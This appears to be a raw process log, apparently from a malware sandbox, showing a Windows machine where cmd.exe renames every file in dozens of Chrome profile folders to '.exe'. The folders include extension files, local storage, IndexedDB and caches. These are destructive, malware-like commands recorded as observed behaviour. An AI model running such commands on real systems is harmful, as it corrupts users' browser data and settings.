"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\fil\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\fr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\fr_CA\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\gl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\gu\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\hi\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\hr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\hu\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\hy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\id\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\is\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\it\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\iw\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\ja\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\ka\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\kk\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\km\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\kn\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\ko\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\lo\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\lt\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\lv\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\ml\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\mn\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\mr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\ms\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\my\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\ne\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\nl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\no\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\pa\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\pl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\pt_BR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\pt_PT\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\ro\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\ru\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\si\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\sk\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\sl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\sr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\sv\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\sw\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\ta\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\te\*.*" "*.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\th\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\tr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\uk\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\ur\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\vi\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\zh_CN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\zh_HK\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\zh_TW\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.58.4_0\_locales\zu\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
